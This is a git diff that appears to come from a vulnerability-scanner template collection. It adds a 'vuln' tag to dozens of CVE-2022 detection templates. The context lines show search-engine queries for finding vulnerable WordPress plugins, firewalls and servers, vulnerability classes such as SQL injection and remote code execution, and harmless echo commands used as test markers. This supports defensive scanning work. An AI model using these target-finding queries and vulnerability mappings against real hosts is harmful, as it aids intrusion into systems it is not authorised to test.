100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml @@ -29,7 +29,7 @@ info: vendor: stopbadbots product: block_and_stop_bad_bots framework: wordpress - tags: time-based-sqli,cve,cve2022,stopbadbots,wp-plugin,wp,unauth,wpscan,sqli,wordpress + tags: time-based-sqli,cve,cve2022,stopbadbots,wp-plugin,wp,unauth,wpscan,sqli,wordpress,vuln variables: IP: '{{rand_ip("1.1.1.0/24")}}' diff --git a/http/cves/2022/CVE-2022-0952.yaml b/http/cves/2022/CVE-2022-0952.yaml index 23e2fefa5c5..59ec0a27394 100644 --- a/http/cves/2022/CVE-2022-0952.yaml +++ b/http/cves/2022/CVE-2022-0952.yaml @@ -30,7 +30,7 @@ info: vendor: sitemap_project product: sitemap framework: wordpress - tags: cve,cve2022,wp,wp-plugin,sitemap,wpscan,wordpress,sitemap_project,vkev + tags: cve,cve2022,wp,wp-plugin,sitemap,wpscan,wordpress,sitemap_project,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index 1e10cf9a002..fea3118aaa6 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="microweber" - icon_hash=780351152 - tags: cve2022,cve,xss,microweber,huntr + tags: cve2022,cve,xss,microweber,huntr,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml index 3ef69dddce6..9cc8fd6436d 100644 --- a/http/cves/2022/CVE-2022-0963.yaml +++ b/http/cves/2022/CVE-2022-0963.yaml @@ -33,7 +33,7 @@ info: fofa-query: - body="microweber" - icon_hash=780351152 - tags: cve,cve2022,xss,microweber,cms,authenticated,huntr,intrusive + tags: cve,cve2022,xss,microweber,cms,authenticated,huntr,intrusive,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index 6e2a585ec9a..66d789b9689 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -33,7 +33,7 @@ info: fofa-query: - body="microweber" - icon_hash=780351152 - tags: cve,cve2022,overflow,microweber,cms,huntr,dos + tags: cve,cve2022,overflow,microweber,cms,huntr,dos,vuln variables: payload: '{{repeat("A", 600)}}' diff --git a/http/cves/2022/CVE-2022-1007.yaml b/http/cves/2022/CVE-2022-1007.yaml index 32fa952d757..865d7d49bfd 100644 --- a/http/cves/2022/CVE-2022-1007.yaml +++ b/http/cves/2022/CVE-2022-1007.yaml @@ -30,7 +30,7 @@ info: vendor: elbtide product: advanced_booking_calendar framework: wordpress - tags: cve,cve2022,wp-plugin,advanced-booking-calendar,wp,authenticated,wpscan,wordpress,xss,elbtide + tags: cve,cve2022,wp-plugin,advanced-booking-calendar,wp,authenticated,wpscan,wordpress,xss,elbtide,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1013.yaml b/http/cves/2022/CVE-2022-1013.yaml index b19d92650a2..1d25a85eab9 100644 --- a/http/cves/2022/CVE-2022-1013.yaml +++ b/http/cves/2022/CVE-2022-1013.yaml @@ -29,7 +29,7 @@ info: vendor: ays-pro product: personal_dictionary framework: wordpress - tags: time-based-sqli,cve,cve2022,wp,unauth,wpscan,sqli,wordpress,wp-plugin,personal-dictionary,ays-pro + tags: time-based-sqli,cve,cve2022,wp,unauth,wpscan,sqli,wordpress,wp-plugin,personal-dictionary,ays-pro,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1020.yaml b/http/cves/2022/CVE-2022-1020.yaml index 28bd59334ac..3d53c1882f4 100644 --- a/http/cves/2022/CVE-2022-1020.yaml +++ b/http/cves/2022/CVE-2022-1020.yaml @@ -25,7 +25,7 @@ info: vendor: codeastrology product: woo_product_table framework: wordpress - tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,unauth,codeastrology,vkev + tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,unauth,codeastrology,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1026.yaml b/http/cves/2022/CVE-2022-1026.yaml index a9cb6c49e2c..366405860fd 100644 --- a/http/cves/2022/CVE-2022-1026.yaml +++ b/http/cves/2022/CVE-2022-1026.yaml @@ -22,7 +22,7 @@ info: product: net_viewer shodan-query: product:"Kyocera Printer Panel" max-request: 1 - tags: cve,cve2022,kyocera,exposure,vkev + tags: cve,cve2022,kyocera,exposure,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1040.yaml b/http/cves/2022/CVE-2022-1040.yaml index d1c63c94f2e..8706e36cc91 100644 --- a/http/cves/2022/CVE-2022-1040.yaml +++ b/http/cves/2022/CVE-2022-1040.yaml @@ -34,7 +34,7 @@ info: - http.title:"sophos" fofa-query: title="sophos" google-query: intitle:"sophos" - tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev,vkev + tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev,vkev,vuln http: - method: POST diff --git a/http/cves/2022/CVE-2022-1054.yaml b/http/cves/2022/CVE-2022-1054.yaml index 1e81377f8b4..0c6b919ce1b 100644 --- a/http/cves/2022/CVE-2022-1054.yaml +++ b/http/cves/2022/CVE-2022-1054.yaml @@ -26,7 +26,7 @@ info: vendor: wpchill product: rsvp_and_event_management framework: wordpress - tags: cve,cve2022,wordpress,wpscan,wp,wp-plugin,wpchill + tags: cve,cve2022,wordpress,wpscan,wp,wp-plugin,wpchill,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-1057.yaml b/http/cves/2022/CVE-2022-1057.yaml index 5496d6e4767..465245316b8 100644 --- a/http/cves/2022/CVE-2022-1057.yaml +++ b/http/cves/2022/CVE-2022-1057.yaml @@ -30,7 +30,7 @@ info: vendor: varktech product: pricing_deals_for_woocommerce framework: wordpress - tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,pricing-deals-for-woocommerce,unauth,varktech + tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,pricing-deals-for-woocommerce,unauth,varktech,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml index 037b8c3287d..3c33d134118 100644 --- a/http/cves/2022/CVE-2022-1058.yaml +++ b/http/cves/2022/CVE-2022-1058.yaml @@ -36,7 +36,7 @@ info: - body="powered by gitea version" - title="gitea" google-query: intitle:"gitea" - tags: cve,cve2022,huntr,open-redirect,gitea + tags: cve,cve2022,huntr,open-redirect,gitea,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1119.yaml b/http/cves/2022/CVE-2022-1119.yaml index d03f49fa27c..615eae3aa3b 100644 --- a/http/cves/2022/CVE-2022-1119.yaml +++ b/http/cves/2022/CVE-2022-1119.yaml @@ -29,7 +29,7 @@ info: vendor: simplefilelist product: simple-file-list framework: wordpress - tags: cve,cve2022,wp,wp-plugin,wpscan,lfi,wordpress,simplefilelist + tags: cve,cve2022,wp,wp-plugin,wpscan,lfi,wordpress,simplefilelist,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-1162.yaml b/http/cves/2022/CVE-2022-1162.yaml index e1c85a691c5..5e287423974 100644 --- a/http/cves/2022/CVE-2022-1162.yaml +++ b/http/cves/2022/CVE-2022-1162.yaml @@ -32,7 +32,7 @@ info: - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" - tags: cve,cve2022,gitlab,packetstorm + tags: cve,cve2022,gitlab,packetstorm,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-1168.yaml b/http/cves/2022/CVE-2022-1168.yaml index d0dc2aeaaae..3afcda1aeba 100644 --- a/http/cves/2022/CVE-2022-1168.yaml +++ b/http/cves/2022/CVE-2022-1168.yaml @@ -29,7 +29,7 @@ info: product: jobsearch_wp_job_board framework: wordpress google-query: inurl:"wp-content/plugins/wp-jobsearch" - tags: cve,cve2022,wp-jobsearch",wpscan,wp-plugin,wp,wordpress,xss,eyecix + tags: cve,cve2022,wp-jobsearch",wpscan,wp-plugin,wp,wordpress,xss,eyecix,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-1170.yaml b/http/cves/2022/CVE-2022-1170.yaml index 78355b23e93..0f92e8c0bd4 100644 --- a/http/cves/2022/CVE-2022-1170.yaml +++ b/http/cves/2022/CVE-2022-1170.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:/wp-content/themes/noo-jobmonster fofa-query: body=/wp-content/themes/noo-jobmonster publicwww-query: "/wp-content/themes/noo-jobmonster" - tags: cve,cve2022,wpscan,wp,wp-theme,wordpress,xss,jobmonster,nootheme + tags: cve,cve2022,wpscan,wp,wp-theme,wordpress,xss,jobmonster,nootheme,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-1221.yaml b/http/cves/2022/CVE-2022-1221.yaml index 9b7032d5d66..82e3ad3f1b7 100644 --- a/http/cves/2022/CVE-2022-1221.yaml +++ b/http/cves/2022/CVE-2022-1221.yaml @@ -29,7 +29,7 @@ info: vendor: gwyn\'s_imagemap_selector_project product: gwyn\'s_imagemap_selector framework: wordpress - tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,gwyn\'s_imagemap_selector_project,vkev + tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,gwyn\'s_imagemap_selector_project,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-1329.yaml b/http/cves/2022/CVE-2022-1329.yaml index 9fba2941791..77ac4674fca 100644 --- a/http/cves/2022/CVE-2022-1329.yaml +++ b/http/cves/2022/CVE-2022-1329.yaml @@ -29,7 +29,7 @@ info: vendor: elementor product: website_builder framework: wordpress - tags: cve2022,cve,rce,wordpress,wp-plugin,wp,elementor,authenticated,intrusive,fileupload,vkev + tags: cve2022,cve,rce,wordpress,wp-plugin,wp,elementor,authenticated,intrusive,fileupload,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index cb11f5cb2df..cdac9abff1a 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -29,7 +29,7 @@ info: vendor: fusion_builder_project product: fusion_builder framework: wordpress - tags: cve,cve2022,wpscan,wordpress,ssrf,themefusion,wp,fusion,avada,intrusive,theme-fusion,fusion_builder_project,vkev + tags: cve,cve2022,wpscan,wordpress,ssrf,themefusion,wp,fusion,avada,intrusive,theme-fusion,fusion_builder_project,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml index b563ab5fa1a..1492ee0319a 100644 --- a/http/cves/2022/CVE-2022-1388.yaml +++ b/http/cves/2022/CVE-2022-1388.yaml @@ -34,7 +34,7 @@ info: - http.title:"big-ip®-+redirect" +"server" fofa-query: title="big-ip®-+redirect" +"server" google-query: intitle:"big-ip®-+redirect" +"server" - tags: cve,cve2022,f5,bigip,rce,mirai,kev,vkev + tags: cve,cve2022,f5,bigip,rce,mirai,kev,vkev,vuln variables: auth: "admin:" cmd: "echo CVE-2022-1388 | rev" diff --git a/http/cves/2022/CVE-2022-1390.yaml b/http/cves/2022/CVE-2022-1390.yaml index 083fe7a1c0a..2f143af6f67 100644 --- a/http/cves/2022/CVE-2022-1390.yaml +++ b/http/cves/2022/CVE-2022-1390.yaml @@ -29,7 +29,7 @@ info: vendor: admin_word_count_column_project product: admin_word_count_column framework: wordpress - tags: cve,cve2022,packetstorm,wpscan,wordpress,wp-plugin,lfi,wp,admin_word_count_column_project,vkev + tags: cve,cve2022,packetstorm,wpscan,wordpress,wp-plugin,lfi,wp,admin_word_count_column_project,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-1391.yaml b/http/cves/2022/CVE-2022-1391.yaml index 5bffc485dda..77975e01097 100644 --- a/http/cves/2022/CVE-2022-1391.yaml +++ b/http/cves/2022/CVE-2022-1391.yaml @@ -29,7 +29,7 @@ info: vendor: kanev product: cab_fare_calculator framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,lfi,wp,edb,wpscan,kanev,vkev + tags: cve,cve2022,wordpress,wp-plugin,lfi,wp,edb,wpscan,kanev,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-1392.yaml b/http/cves/2022/CVE-2022-1392.yaml index 60a86385c95..6500cff23fb 100644 --- a/http/cves/2022/CVE-2022-1392.yaml +++ b/http/cves/2022/CVE-2022-1392.yaml @@ -29,7 +29,7 @@ info: vendor: commoninja product: videos_sync_pdf framework: wordpress - tags: cve,cve2022,lfi,wp-plugin,unauth,wpscan,packetstorm,wp,wordpress,commoninja + tags: cve,cve2022,lfi,wp-plugin,unauth,wpscan,packetstorm,wp,wordpress,commoninja,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-1398.yaml b/http/cves/2022/CVE-2022-1398.yaml index be8008d72da..9f42ea2c23c 100644 --- a/http/cves/2022/CVE-2022-1398.yaml +++ b/http/cves/2022/CVE-2022-1398.yaml @@ -29,7 +29,7 @@ info: vendor: external_media_without_import_project product: external_media_without_import framework: wordpress - tags: cve2022,cve,ssrf,wordpress,wp-plugin,wp,wpscan,external-media-without-import,authenticated,intrusive,external_media_without_import_project + tags: cve2022,cve,ssrf,wordpress,wp-plugin,wp,wpscan,external-media-without-import,authenticated,intrusive,external_media_without_import_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1439.yaml b/http/cves/2022/CVE-2022-1439.yaml index 62fe3756c84..9ffc5e199c6 100644 --- a/http/cves/2022/CVE-2022-1439.yaml +++ b/http/cves/2022/CVE-2022-1439.yaml @@ -33,7 +33,7 @@ info: fofa-query: - body="microweber" - icon_hash=780351152 - tags: cve,cve2022,microweber,xss,huntr,vkev + tags: cve,cve2022,microweber,xss,huntr,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-1442.yaml b/http/cves/2022/CVE-2022-1442.yaml index a52b719eb06..49f80815122 100644 --- a/http/cves/2022/CVE-2022-1442.yaml +++ b/http/cves/2022/CVE-2022-1442.yaml @@ -31,7 +31,7 @@ info: product: metform_elementor_contact_form_builder framework: wordpress google-query: inurl:/wp-content/plugins/metform - tags: cve,cve2022,wpscan,wordpress,wp-plugin,disclosure,unauth,metform,wp,wpmet + tags: cve,cve2022,wpscan,wordpress,wp-plugin,disclosure,unauth,metform,wp,wpmet,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1574.yaml b/http/cves/2022/CVE-2022-1574.yaml index bc6f5195719..d104586a540 100644 --- a/http/cves/2022/CVE-2022-1574.yaml +++ b/http/cves/2022/CVE-2022-1574.yaml @@ -29,7 +29,7 @@ info: vendor: html2wp_project product: html2wp framework: wordpress - tags: cve,cve2022,wp-plugin,wp,fileupload,unauth,wpscan,wordpress,intrusive,html2wp,html2wp_project + tags: cve,cve2022,wp-plugin,wp,fileupload,unauth,wpscan,wordpress,intrusive,html2wp,html2wp_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1580.yaml b/http/cves/2022/CVE-2022-1580.yaml index e6c5c4e5358..d9ef856e184 100644 --- a/http/cves/2022/CVE-2022-1580.yaml +++ b/http/cves/2022/CVE-2022-1580.yaml @@ -27,7 +27,7 @@ info: publicwww-query: "/wp-content/plugins/site-offline/" shodan-query: http.html:/wp-content/plugins/site-offline/ fofa-query: body=/wp-content/plugins/site-offline/ - tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp,freehtmldesigns + tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp,freehtmldesigns,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml index eafda36080e..61e6badfb53 100644 --- a/http/cves/2022/CVE-2022-1595.yaml +++ b/http/cves/2022/CVE-2022-1595.yaml @@ -22,7 +22,7 @@ info: cpe: cpe:2.3:a:hc_custom_wp-admin_url_project:hc_custom_wp-admin_url:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - tags: cve,cve2022,unauth,wpscan,wordpress,wp-plugin,wp,hc-custom-wp-admin-url + tags: cve,cve2022,unauth,wpscan,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1597.yaml b/http/cves/2022/CVE-2022-1597.yaml index 92101c33524..a243238a730 100644 --- a/http/cves/2022/CVE-2022-1597.yaml +++ b/http/cves/2022/CVE-2022-1597.yaml @@ -31,7 +31,7 @@ info: product: wpqa_builder framework: wordpress google-query: inurl:/wp-content/plugins/wpqa - tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,wpqa,2code + tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,wpqa,2code,vuln variables: user: "{{to_lower(rand_base(5))}}" pass: "{{user}}{{to_lower(rand_base(3))}}" diff --git a/http/cves/2022/CVE-2022-1598.yaml b/http/cves/2022/CVE-2022-1598.yaml index beb316aa845..f21c0cc3232 100644 --- a/http/cves/2022/CVE-2022-1598.yaml +++ b/http/cves/2022/CVE-2022-1598.yaml @@ -31,7 +31,7 @@ info: product: wpqa_builder framework: wordpress google-query: inurl:/wp-content/plugins/wpqa - tags: cve,cve2022,wordpress,wp-plugin,wpqa,idor,wpscan,2code + tags: cve,cve2022,wordpress,wp-plugin,wpqa,idor,wpscan,2code,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-1609.yaml b/http/cves/2022/CVE-2022-1609.yaml index 6148e28680a..e5044ee1559 100644 --- a/http/cves/2022/CVE-2022-1609.yaml +++ b/http/cves/2022/CVE-2022-1609.yaml @@ -29,7 +29,7 @@ info: vendor: weblizar product: school_management framework: wordpress - tags: cve,cve2022,rce,wp,backdoor,wpscan,wordpress,weblizar,vkev + tags: cve,cve2022,rce,wp,backdoor,wpscan,wordpress,weblizar,vkev,vuln variables: cmd: "echo CVE-2022-1609 | rev" diff --git a/http/cves/2022/CVE-2022-1711.yaml b/http/cves/2022/CVE-2022-1711.yaml index bc9cc404791..847e8211534 100644 --- a/http/cves/2022/CVE-2022-1711.yaml +++ b/http/cves/2022/CVE-2022-1711.yaml @@ -25,7 +25,7 @@ info: verified: true shodan-query: html:"draw.io" fofa-query: body="draw.io" - tags: cve,cve2022,ssrf,drawio,diagrams,jgraph + tags: cve,cve2022,ssrf,drawio,diagrams,jgraph,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml index e31085195a2..918d80369db 100644 --- a/http/cves/2022/CVE-2022-1713.yaml +++ b/http/cves/2022/CVE-2022-1713.yaml @@ -33,7 +33,7 @@ info: - http.title:"flowchart maker" fofa-query: title="flowchart maker" google-query: intitle:"flowchart maker" - tags: cve,cve2022,drawio,ssrf,oss,huntr,diagrams + tags: cve,cve2022,drawio,ssrf,oss,huntr,diagrams,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml index c617c260151..5b48c694162 100644 --- a/http/cves/2022/CVE-2022-1724.yaml +++ b/http/cves/2022/CVE-2022-1724.yaml @@ -29,7 +29,7 @@ info: vendor: "simple-membership-plugin" product: "simple_membership" framework: wordpress - tags: cve,cve2022,xss,wp,wordpress,wpscan,wp-plugin,simple-membership-plugin + tags: cve,cve2022,xss,wp,wordpress,wpscan,wp-plugin,simple-membership-plugin,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml index f3aecd572be..9ad57ec3662 100644 --- a/http/cves/2022/CVE-2022-1756.yaml +++ b/http/cves/2022/CVE-2022-1756.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.html:/wp-content/plugins/newsletter/ fofa-query: body=/wp-content/plugins/newsletter/ publicwww-query: "/wp-content/plugins/newsletter/" - tags: cve,cve2022,wpscan,newsletter,xss,authenticated,thenewsletterplugin,wordpress + tags: cve,cve2022,wpscan,newsletter,xss,authenticated,thenewsletterplugin,wordpress,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1768.yaml b/http/cves/2022/CVE-2022-1768.yaml index 7aa81a470ad..4a40b7f9d24 100644 --- a/http/cves/2022/CVE-2022-1768.yaml +++ b/http/cves/2022/CVE-2022-1768.yaml @@ -30,7 +30,7 @@ info: vendor: carrcommunications product: rsvpmaker framework: wordpress - tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker,carrcommunications,vkev + tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker,carrcommunications,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml index 9ee23fced53..bd78b330abe 100644 --- a/http/cves/2022/CVE-2022-1815.yaml +++ b/http/cves/2022/CVE-2022-1815.yaml @@ -32,7 +32,7 @@ info: shodan-query: http.title:"flowchart maker" fofa-query: title="flowchart maker" google-query: intitle:"flowchart maker" - tags: cve,cve2022,huntr,drawio,ssrf,oast,oss,jgraph,diagrams + tags: cve,cve2022,huntr,drawio,ssrf,oast,oss,jgraph,diagrams,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1883.yaml b/http/cves/2022/CVE-2022-1883.yaml index 0875aee3fb7..c45a602db89 100644 --- a/http/cves/2022/CVE-2022-1883.yaml +++ b/http/cves/2022/CVE-2022-1883.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: camptocamp product: terraboard - tags: time-based-sqli,cve,cve2022,terraboard,sqli,huntr,camptocamp,vkev + tags: time-based-sqli,cve,cve2022,terraboard,sqli,huntr,camptocamp,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1903.yaml b/http/cves/2022/CVE-2022-1903.yaml index 80cb0c1e700..9a230f8f559 100644 --- a/http/cves/2022/CVE-2022-1903.yaml +++ b/http/cves/2022/CVE-2022-1903.yaml @@ -29,7 +29,7 @@ info: vendor: armemberplugin product: armember framework: wordpress - tags: cve,cve2022,account-takeover,wpscan,wordpress,wp-plugin,wp,armember-membership,unauthenticated,armemberplugin,vkev + tags: cve,cve2022,account-takeover,wpscan,wordpress,wp-plugin,wp,armember-membership,unauthenticated,armemberplugin,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1904.yaml b/http/cves/2022/CVE-2022-1904.yaml index f13d9fdb91a..d01d229bb58 100644 --- a/http/cves/2022/CVE-2022-1904.yaml +++ b/http/cves/2022/CVE-2022-1904.yaml @@ -30,7 +30,7 @@ info: vendor: fatcatapps product: easy_pricing_tables framework: wordpress - tags: cve,cve2022,wp,wordpress,wpscan,wp-plugin,xss,fatcatapps + tags: cve,cve2022,wp,wordpress,wpscan,wp-plugin,xss,fatcatapps,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-1906.yaml b/http/cves/2022/CVE-2022-1906.yaml index 7d29c4285fb..44dbf973dca 100644 --- a/http/cves/2022/CVE-2022-1906.yaml +++ b/http/cves/2022/CVE-2022-1906.yaml @@ -30,7 +30,7 @@ info: product: copyright_proof framework: wordpress google-query: inurl:/wp-content/plugins/digiproveblog - tags: cve,cve2022,wordpress,xss,wp-plugin,wp,wpscan,digiprove + tags: cve,cve2022,wordpress,xss,wp-plugin,wp,wpscan,digiprove,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1910.yaml b/http/cves/2022/CVE-2022-1910.yaml index 52a038e251f..a41cb4dd902 100644 --- a/http/cves/2022/CVE-2022-1910.yaml +++ b/http/cves/2022/CVE-2022-1910.yaml @@ -30,7 +30,7 @@ info: vendor: averta product: shortcodes_and_extra_features_for_phlox_theme framework: wordpress - tags: cve,cve2022,wordpress,xss,auxin-elements,wpscan,wp-plugin,wp,averta + tags: cve,cve2022,wordpress,xss,auxin-elements,wpscan,wp-plugin,wp,averta,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-1916.yaml b/http/cves/2022/CVE-2022-1916.yaml index 8f417fb1dee..ce00ef4ca1e 100644 --- a/http/cves/2022/CVE-2022-1916.yaml +++ b/http/cves/2022/CVE-2022-1916.yaml @@ -28,7 +28,7 @@ info: vendor: pluginus product: woot framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,xss,wpscan,wp,pluginus,vkev + tags: cve,cve2022,wordpress,wp-plugin,xss,wpscan,wp,pluginus,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-1933.yaml b/http/cves/2022/CVE-2022-1933.yaml index 3f597ad65ee..8a825d20edd 100644 --- a/http/cves/2022/CVE-2022-1933.yaml +++ b/http/cves/2022/CVE-2022-1933.yaml @@ -30,7 +30,7 @@ info: vendor: collect_and_deliver_interface_for_woocommerce_project product: collect_and_deliver_interface_for_woocommerce framework: wordpress - tags: cve,cve2022,cdi,wpscan,wp-plugin,wp,wordpress,xss,collect_and_deliver_interface_for_woocommerce_project + tags: cve,cve2022,cdi,wpscan,wp-plugin,wp,wordpress,xss,collect_and_deliver_interface_for_woocommerce_project,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-1937.yaml b/http/cves/2022/CVE-2022-1937.yaml index 3c0a6d31333..2ed7f33900c 100644 --- a/http/cves/2022/CVE-2022-1937.yaml +++ b/http/cves/2022/CVE-2022-1937.yaml @@ -29,7 +29,7 @@ info: vendor: awin product: awin_data_feed framework: wordpress - tags: cve,cve2022,xss,awin,wpscan,wp-plugin,wp,wordpress,authenticated + tags: cve,cve2022,xss,awin,wpscan,wp-plugin,wp,wordpress,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1946.yaml b/http/cves/2022/CVE-2022-1946.yaml index 141b76dffb5..331a2771e74 100644 --- a/http/cves/2022/CVE-2022-1946.yaml +++ b/http/cves/2022/CVE-2022-1946.yaml @@ -30,7 +30,7 @@ info: product: gallery framework: wordpress google-query: inurl:"/wp-content/plugins/gallery-album/" - tags: cve,cve2022,wpscan,wp,xss,wordpress,gallery,unauth,wp-plugin,wpdevart + tags: cve,cve2022,wpscan,wp,xss,wordpress,gallery,unauth,wp-plugin,wpdevart,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-1950.yaml b/http/cves/2022/CVE-2022-1950.yaml index 2958c52b0b7..3f550b875c2 100644 --- a/http/cves/2022/CVE-2022-1950.yaml +++ b/http/cves/2022/CVE-2022-1950.yaml @@ -24,7 +24,7 @@ info: product: youzify framework: wordpress fofa-query: body="/wp-content/plugins/youzify" - tags: cve,cve2022,youzify,wp,wp-plugin,wordpress,sqli,time-based-sqli,vkev + tags: cve,cve2022,youzify,wp,wp-plugin,wordpress,sqli,time-based-sqli,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-1952.yaml b/http/cves/2022/CVE-2022-1952.yaml index b9393e61e35..95649c0699a 100644 --- a/http/cves/2022/CVE-2022-1952.yaml +++ b/http/cves/2022/CVE-2022-1952.yaml @@ -30,7 +30,7 @@ info: vendor: syntactics product: free_booking_plugin_for_hotels\,_restaurant_and_car_rental framework: wordpress - tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics,vkev + tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics,vkev,vuln variables: string: "CVE-2022-1952" diff --git a/http/cves/2022/CVE-2022-2034.yaml b/http/cves/2022/CVE-2022-2034.yaml index f42becdd25f..e2aca407f61 100644 --- a/http/cves/2022/CVE-2022-2034.yaml +++ b/http/cves/2022/CVE-2022-2034.yaml @@ -28,7 +28,7 @@ info: vendor: automattic product: sensei_lms framework: wordpress - tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,fuzz,hackerone,wordpress,wp-plugin,automattic + tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,fuzz,hackerone,wordpress,wp-plugin,automattic,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2130.yaml b/http/cves/2022/CVE-2022-2130.yaml index 6f007bb09b2..860c7691e56 100644 --- a/http/cves/2022/CVE-2022-2130.yaml +++ b/http/cves/2022/CVE-2022-2130.yaml @@ -32,7 +32,7 @@ info: - icon_hash=780351152 vendor: microweber product: microweber - tags: cve,cve2022,microweber,xss + tags: cve,cve2022,microweber,xss,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-21371.yaml b/http/cves/2022/CVE-2022-21371.yaml index 570260a04bd..a7ee6948a9e 100644 --- a/http/cves/2022/CVE-2022-21371.yaml +++ b/http/cves/2022/CVE-2022-21371.yaml @@ -32,7 +32,7 @@ info: - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: cve,cve2022,lfi,weblogic,oracle,packetstorm,vkev + tags: cve,cve2022,lfi,weblogic,oracle,packetstorm,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-21500.yaml b/http/cves/2022/CVE-2022-21500.yaml index 167b87d5e84..ad1ce79effd 100644 --- a/http/cves/2022/CVE-2022-21500.yaml +++ b/http/cves/2022/CVE-2022-21500.yaml @@ -33,7 +33,7 @@ info: - http.title:"login" "x-oracle-dms-ecid" 200 fofa-query: title="login" "x-oracle-dms-ecid" 200 google-query: intitle:"login" "x-oracle-dms-ecid" 200 - tags: cve,cve2022,oracle,misconfig,auth-bypass,vkev + tags: cve,cve2022,oracle,misconfig,auth-bypass,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-21587.yaml b/http/cves/2022/CVE-2022-21587.yaml index 6bf6552b6cb..a1c018d2509 100644 --- 